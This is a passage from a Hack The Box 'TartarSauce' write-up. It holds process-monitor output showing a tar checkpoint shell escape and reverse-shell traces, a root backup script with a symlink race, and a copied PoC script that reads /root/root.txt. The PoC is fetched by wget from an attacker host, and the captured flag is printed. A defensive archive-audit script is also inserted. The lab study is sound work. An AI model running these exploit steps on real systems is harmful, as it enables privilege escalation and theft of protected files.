2024/01/06 11:08:54 CMD: UID=0 PID=4028 | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
2024/01/06 11:08:54 CMD: UID=0 PID=4013 |
2024/01/06 11:08:54 CMD: UID=0 PID=3606 |
2024/01/06 11:08:54 CMD: UID=33 PID=3491 | /bin/bash
2024/01/06 11:08:54 CMD: UID=33 PID=3490 | python3 -c import pty;pty.spawn("/bin/bash")
2024/01/06 11:08:54 CMD: UID=33 PID=3489 | /bin/sh -i
2024/01/06 11:08:54 CMD: UID=33 PID=3485 | sh -c uname -a; w; id; /bin/sh -i
2024/01/06 11:08:54 CMD: UID=33 PID=3062 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=3061 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2808 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2807 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=0 PID=2785 |
2024/01/06 11:08:54 CMD: UID=33 PID=2508 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2378 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2351 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2206 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=33 PID=2202 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=0 PID=1766 |
2024/01/06 11:08:54 CMD: UID=33 PID=1393 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=0 PID=1386 | /usr/sbin/apache2 -k start
2024/01/06 11:08:54 CMD: UID=0 PID=1309 | /sbin/agetty --noclear tty1 linux
2024/01/06 11:08:54 CMD: UID=107 PID=1278 | /usr/sbin/mysqld
2024/01/06 11:08:54 CMD: UID=0 PID=1267 | /sbin/iscsid
2024/01/06 11:08:54 CMD: UID=0 PID=1266 | /sbin/iscsid
2024/01/06 11:08:54 CMD: UID=0 PID=1099 | /usr/lib/policykit-1/polkitd --no-debug
2024/01/06 11:08:54 CMD: UID=0 PID=1083 | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2024/01/06 11:08:54 CMD: UID=104 PID=952 | /usr/sbin/rsyslogd -n
2024/01/06 11:08:54 CMD: UID=0 PID=951 | /usr/bin/lxcfs /var/lib/lxcfs/
2024/01/06 11:08:54 CMD: UID=1 PID=950 | /usr/sbin/atd -f
2024/01/06 11:08:54 CMD: UID=0 PID=949 | /usr/lib/accountsservice/accounts-daemon
2024/01/06 11:08:54 CMD: UID=0 PID=948 | /usr/sbin/acpid
2024/01/06 11:08:54 CMD: UID=0 PID=947 | /usr/lib/snapd/snapd
2024/01/06 11:08:54 CMD: UID=0 PID=946 | /usr/bin/vmtoolsd
2024/01/06 11:08:54 CMD: UID=0 PID=942 | /usr/sbin/cron -f
2024/01/06 11:08:54 CMD: UID=0 PID=941 | /lib/systemd/systemd-logind
2024/01/06 11:08:54 CMD: UID=108 PID=925 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2024/01/06 11:08:54 CMD: UID=100 PID=798 | /lib/systemd/systemd-timesyncd
2024/01/06 11:08:54 CMD: UID=0 PID=761 |
2024/01/06 11:08:54 CMD: UID=0 PID=511 |
2024/01/06 11:08:54 CMD: UID=0 PID=507 | /sbin/lvmetad -f
2024/01/06 11:08:54 CMD: UID=0 PID=504 | /lib/systemd/systemd-udevd
2024/01/06 11:08:54 CMD: UID=0 PID=498 |
2024/01/06 11:08:54 CMD: UID=0 PID=497 |
2024/01/06 11:08:54 CMD: UID=0 PID=496 |
2024/01/06 11:08:54 CMD: UID=0 PID=495 |
2024/01/06 11:08:54 CMD: UID=0 PID=488 | /lib/systemd/systemd-journald
2024/01/06 11:08:54 CMD: UID=0 PID=438 |
2024/01/06 11:08:54 CMD: UID=0 PID=437 |
2024/01/06 11:08:54 CMD: UID=0 PID=6 |
2024/01/06 11:08:54 CMD: UID=0 PID=4 |
2024/01/06 11:08:54 CMD: UID=0 PID=2 |
2024/01/06 11:08:54 CMD: UID=0 PID=1 | /sbin/init
2024/01/06 11:09:01 CMD: UID=0 PID=4194 | /bin/sh -c [ -x /usr/lib/php/sessionclean ] && /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4193 | /bin/sh -c [ -x /usr/lib/php/sessionclean ] && /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4192 | /usr/sbin/CRON -f
2024/01/06 11:09:01 CMD: UID=0 PID=4198 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4197 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4196 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4195 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4199 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4200 | /bin/sh /usr/sbin/phpquery -V
2024/01/06 11:09:01 CMD: UID=0 PID=4203 | /bin/sh /usr/sbin/phpquery -V
2024/01/06 11:09:01 CMD: UID=0 PID=4202 | /bin/sh /usr/sbin/phpquery -V
2024/01/06 11:09:01 CMD: UID=0 PID=4206 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4205 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4209 | sed -ne s/^session\.save_handler=\(.*\)$/\1/p
2024/01/06 11:09:01 CMD: UID=0 PID=4208 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4207 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4212 | sed -ne s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p
2024/01/06 11:09:01 CMD: UID=0 PID=4211 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4210 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4215 | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p
2024/01/06 11:09:01 CMD: UID=0 PID=4214 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4213 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4218 | sed -e s,@VERSION@,7.0,
2024/01/06 11:09:01 CMD: UID=0 PID=4217 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4216 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4219 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4222 | sed -ne s/^session\.save_handler=\(.*\)$/\1/p
2024/01/06 11:09:01 CMD: UID=0 PID=4221 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4220 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4225 | sed -ne s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p
2024/01/06 11:09:01 CMD: UID=0 PID=4224 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4223 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4228 | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p
2024/01/06 11:09:01 CMD: UID=0 PID=4227 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4226 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4231 | sed -e s,@VERSION@,7.0,
2024/01/06 11:09:01 CMD: UID=0 PID=4230 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:01 CMD: UID=0 PID=4229 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:02 CMD: UID=0 PID=4233 | /bin/sh -e /usr/lib/php/sessionclean
2024/01/06 11:09:25 CMD: UID=0 PID=4248 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4247 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4246 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4245 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4244 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4243 | cut -d -f1
2024/01/06 11:09:25 CMD: UID=0 PID=4242 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4241 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4240 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4239 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4238 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4237 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4236 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4235 | /lib/systemd/systemd-udevd
2024/01/06 11:09:25 CMD: UID=0 PID=4234 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4251 | seq 72
2024/01/06 11:09:25 CMD: UID=0 PID=4250 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4249 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4252 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4253 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4254 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4255 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4256 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4257 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4258 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4259 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4260 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4261 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4262 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4263 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4264 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4265 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4266 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4267 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4268 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4269 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4270 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4271 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4272 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4273 |
2024/01/06 11:09:25 CMD: UID=0 PID=4274 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4275 |
2024/01/06 11:09:25 CMD: UID=0 PID=4276 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4277 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4278 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4279 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4280 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4281 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4282 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4283 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4284 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4285 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4286 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4287 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4288 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4289 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4290 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4291 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4292 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4293 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4294 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4295 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4296 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4297 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4298 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4299 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4300 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4301 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4302 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4303 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4304 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4305 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4307 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4308 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4309 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4310 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4311 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4312 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4313 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4314 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4315 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4316 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4317 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4318 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4319 | /usr/bin/printf -
2024/01/06 11:09:25 CMD: UID=0 PID=4320 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4321 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4322 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4323 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4324 | /bin/date
2024/01/06 11:09:25 CMD: UID=0 PID=4325 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4326 | /bin/rm -rf /var/tmp/. /var/tmp/.. /var/tmp/check
2024/01/06 11:09:25 CMD: UID=0 PID=4329 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:25 CMD: UID=0 PID=4330 | /bin/sleep 30
2024/01/06 11:09:25 CMD: UID=1000 PID=4333 | /bin/tar -zcvf /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 /var/www/html
2024/01/06 11:09:26 CMD: UID=1000 PID=4334 | gzip
2024/01/06 11:09:55 CMD: UID=0 PID=4339 | /bin/tar -zxvf /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 -C /var/tmp/check
2024/01/06 11:09:56 CMD: UID=0 PID=4340 | gzip -d
2024/01/06 11:09:56 CMD: UID=0 PID=4342 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:56 CMD: UID=0 PID=4341 | /bin/bash /usr/sbin/backuperer
2024/01/06 11:09:56 CMD: UID=0 PID=4343 | /bin/mv /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 /var/backups/onuma-www-dev.bak
2024/01/06 11:09:56 CMD: UID=0 PID=4344 | /bin/rm -rf /var/tmp/check . ..
2024/01/06 11:09:56 CMD: UID=0 PID=4345 |

23. Among the processes, one stands out as suspicious:

/bin/bash /usr/sbin/backuperer

24. Let's look at the contents of that file.

onuma@TartarSauce:/$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
onuma@TartarSauce:/$

In the script above, /var/www/html is backed up into /var/tmp and then extracted to /var/tmp/check/var/www/html. If the extracted files do not match the current /var/www/html directory, they are left on the server in the open for 30 seconds. During that window they can be read and executed as root, because root wrote them during the process. The diff -r in integrity_chk also runs as root, so whatever a symlink inside the archive points to is read by root and appended to $errormsg. By exploiting this, we can place files of our choosing into a malicious archive that gets extracted onto the filesystem.

As far as I know, there is no way to turn this into a root shell on this box. But I can read files as root.
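As an added example (not the box's backuperer script, not the PoC, and not from either referenced writeup), here is a POSIX shell audit that backuperer could run before its tar -zxvf ... -C $check step. It rejects archives whose members are symlinks, hard links, absolute paths, or contain ".." components, and it assumes GNU tar with gzip-compressed archives as used by the script above.

```shell
#!/bin/sh
# Added example, not the box's backuperer script and not from any referenced
# writeup: a pre-extraction audit that refuses archives containing symlinks,
# hard links, absolute paths or ".." components. Assumes GNU tar and gzip
# archives, as used by the script above.

# audit_archive <archive.tar.gz>: prints offending members; returns 0 if the
# archive is safe to extract, 1 if any member is rejected, 2 if unreadable.
audit_archive() {
    ar_a=$1
    ar_rc=0
    # Fail closed: an archive that cannot be listed is rejected, not passed.
    if ! ar_names=$(tar -tzf "$ar_a" 2>/dev/null); then
        echo "REJECT: cannot list $ar_a"; return 2
    fi
    # Pass 1: plain listing, one member name per line. Reject absolute
    # paths and any ".." path component (either would escape the -C dir).
    printf '%s\n' "$ar_names" | awk '
        $0 ~ /^\//                        { print "REJECT absolute path: " $0; bad=1; next }
        $0 == ".." || $0 ~ /^\.\.\// ||
        $0 ~ /\/\.\.\// || $0 ~ /\/\.\.$/ { print "REJECT traversal: " $0; bad=1 }
        END { exit bad + 0 }' || ar_rc=1
    # Pass 2: verbose listing. The first character of the mode column is
    # "l" for a symlink and "h" for a hard link; either lets the archive
    # author redirect a root-run diff or write to a path of their choosing.
    tar -tzvf "$ar_a" 2>/dev/null | awk '
        substr($1, 1, 1) == "l" || substr($1, 1, 1) == "h" {
            print "REJECT link member: " $0; bad=1 }
        END { exit bad + 0 }' || ar_rc=1
    return $ar_rc
}

# Constructed demonstration: a benign tree and one carrying a robots.txt
# symlink like the PoC's; only the first should pass the audit.
demo() {
    d_w=$(mktemp -d)
    mkdir -p "$d_w/clean/var/www/html" "$d_w/evil/var/www/html"
    echo 'User-agent: *' > "$d_w/clean/var/www/html/robots.txt"
    ln -s /root/root.txt "$d_w/evil/var/www/html/robots.txt"
    tar -C "$d_w/clean" -czf "$d_w/clean.tgz" var
    tar -C "$d_w/evil"  -czf "$d_w/evil.tgz"  var
    audit_archive "$d_w/clean.tgz" && echo "clean.tgz: safe to extract"
    audit_archive "$d_w/evil.tgz"  || echo "evil.tgz: rejected, not extracted"
    rm -rf "$d_w"
}

demo
```

The audit only covers member names and types; it does not replace extracting as an unprivileged user or running the comparison with a diff that does not follow symlinks.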

25. From the walkthrough reports, this suspicious script is the final key, but on this box there is no way to obtain a real root shell; only file reads as root are possible.

26. Here I copy the PoC code from the walkthrough report.

#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

27. Upload it to the target and try running it.

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.88 - - [07/Jan/2024 00:16:20] code 404, message File not found
10.10.10.88 - - [07/Jan/2024 00:16:20] "GET /pco.sh HTTP/1.1" 404 -
10.10.10.88 - - [07/Jan/2024 00:16:41] "GET /poc.sh HTTP/1.1" 200 -

onuma@TartarSauce:~$ wget http://10.10.14.5:8080/poc.sh
wget http://10.10.14.5:8080/poc.sh
--2024-01-06 11:16:41-- http://10.10.14.5:8080/poc.sh
Connecting to 10.10.14.5:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 934 [text/x-sh]
Saving to: 'poc.sh'

poc.sh 100%[===================>] 934 --.-KB/s in 0s

2024-01-06 11:16:41 (81.5 MB/s) - 'poc.sh' saved [934/934]

onuma@TartarSauce:~$

onuma@TartarSauce:~$ chmod +x poc.sh
chmod +x poc.sh

onuma@TartarSauce:~$ ./poc.sh
./poc.sh
Waiting for archive filename to change...
File changed... copying here
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.b9374902e8709ee04befb67211a23156c94072be': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
Waiting for new logs...
Only in /var/www/html/webservices/monstra-3.0.4: robots.txt
Only in /var/www/html/webservices/monstra-3.0.4: rss.php
Only in /var/www/html/webservices/monstra-3.0.4: sitemap.xml
Only in /var/www/html/webservices/monstra-3.0.4: storage
Only in /var/www/html/webservices/monstra-3.0.4: tmp
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
tail: inotify resources exhausted
tail: inotify cannot be used, reverting to polling
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Sat Jan 6 11:20:01 EST 2024
------------------------------------------------------------------------
/var/tmp/.b9374902e8709ee04befb67211a23156c94072be
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> 3b1e9f541d6924b0983673e647c225ff
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty

28. With that, the flag for this box has been read out as well:

3b1e9f541d6924b0983673e647c225ff

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/138


TartarSauce-htb-writeup
https://sh1yan.top/2024/01/07/TartarSauce-htb-writeup/
Author: shiyan
Published: 7 January 2024